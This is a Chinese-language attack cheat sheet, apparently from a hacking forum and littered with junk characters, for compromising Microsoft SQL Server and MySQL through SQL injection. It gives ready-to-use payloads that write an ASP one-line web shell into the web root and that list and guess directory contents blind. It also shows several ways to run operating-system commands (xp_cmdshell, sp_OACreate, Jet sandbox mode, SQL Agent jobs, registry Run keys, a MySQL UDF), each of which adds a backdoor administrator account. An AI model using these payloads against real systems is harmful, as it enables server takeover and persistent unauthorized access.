MSSQL语句导出一句话木马
6 J G" J) @" v" R6 R% T* b Z首先确定网站的WEB路径
! Q' X7 i' K. s7 Y, k F;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
! I% W- } Q3 x+ T# `
, ~+ ~* f1 P: P I;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- ; T+ b+ ]! K! r. X
//将一句话木马插入表中
o) z% Y& c3 W& r. R" n0 K) Q, K- V( W$ {
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- ' z( B P# D- {& t
//导出一个ASP文件7 c- p9 R) ?: M/ h6 u
- Q& ^ ~- ?. v6 x9 ^5 c
- H. Z/ N5 O3 @8 Y8 c关于MSSQL列目录
4 e$ v' |% M q;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表4 u- }( X9 }% k" f& Z
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
7 i' W: S; d0 F/ X- u- N/ v z6 y5 F! p' e* \& E9 z
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录) \' N( G0 p+ S4 h7 I- D) F9 [, y
+ t: D7 \; I* {And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
R$ v, t5 D* v/ j' l6 A* I, w
4 w9 a) s4 C. b4 }$ n1 i! SAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
, ]6 o: g+ n8 l
7 A7 M( Y8 d/ n( F. O, L! T3 U0 y) l6 p. K5 `! @8 U1 x7 `
数据库版本和权限查看; T$ R7 g" ]% l: ]
and 1=(select @@VERSION) //查看详细的数据库信息.: @; e5 m. t" Y: b
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA1 ?* F, { I$ [: M
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER! D' y+ D4 u3 g. [. D# D
: \1 I- [% O# r& |) {
, n! l \ S: H1.利用xp_cmdshell执行命令 i. p# D& j' f0 t3 z7 Z* F
exec master..xp_cmdshell 'net user rfire 123456 /add'
4 X/ \: ^) `; |exec master..xp_cmdshell 'net localgroup administrators rfire /add'
' B1 K9 b7 H* ~+ g6 Y4 R
1 n7 W8 X7 L+ R% G( c恢复xp_cmdshell存储过程8 Q+ |. |7 d0 ~3 n; l' `
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
i7 X- M1 T" g1 T' |" Y' ?' t4 j) p2 `0 D [( S
R0 C0 X5 V9 ^' L8 D/ m2.利用SP_OAcreate和SP_OAMETHOD执行命令
; @4 F( l. T. ^ r- ~9 k+ s在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
7 f( k/ K( o6 M8 l4 K9 mDECLARE @shell INT //建立一个@shell实体# ]6 m4 `" f% A
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
! A% S. G) Y" IEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例' N R# S3 n* u0 M* s
; H6 G( Z& X* z: s/ e+ H
/ @/ H" B; p/ R( Z3.利用沙盒模式
6 l# p: F1 H# t; T" _8 j$ Y; p A" f0 R先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
$ I, Q, }3 r2 w# {* r" |开启沙盒模式:
+ C! i# X" x, f3 f9 vEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
8 L0 M; L4 o- |8 _* N* O0 e5 _& n) ]
/ x3 ~! k7 _+ k1 q+ }执行命令:( g* j- I. u6 a4 P
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
7 J/ Y7 Z* d* `$ |5 l9 L7 c. G Y9 J, {
# t# l2 G% W2 U1 u. d% B# u
4.利用SQL代理执行命令0 w" z9 r" n" [, U: _+ ~. |+ ~
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
$ G: I9 E7 ?: {7 K8 B
* s& ~: c0 W* H3 s. H, T. j( U6 a执行命令:
# F. M6 h+ d/ b% i1 Muse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错5 q* Q! Z* n# g
exec sp_add_job 'x'
- j0 G! w; S G. O9 J3 texec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
( X: f0 F2 k, O7 [( `) dexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业, i/ C" u# T z N+ L9 g0 l: {
( Y+ z. B5 r8 P/ Q$ u8 f9 g6 R
; b7 }! { n$ m1 N: V. I$ Y. j5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)- U3 k: g n# b% c% p# P+ y
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'3 ?8 h3 ^* f- n4 Q
- U2 C7 Y& m0 ^$ ^# M
. j4 { Z' M2 W, S6.MYSQL的命令执行
. I* ?7 T: D) f3 s! \) @; _( ?1 {MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
/ c% N1 x/ M$ ]. o6 S% x首先要在su.php下导出c:\windows\udf.dll
0 V1 J8 m; s3 w+ W导出后执行创建自定义函数命令:) }, Y8 `6 ?. C; C B, p) g4 T2 z( F
Create Function cmdshell returns string soname 'udf.dll'
5 I- O# T, r- W: f执行命令7 |- m) F7 a6 C3 ?8 `3 ? j% q
select cmdshell('net user rfire 123456 /add')
0 ~; A/ N5 m/ B, L9 Y: q, H执行后删除函数 drop function cmdshell- ^3 B. M/ l5 ?6 w* I0 e2 ^
|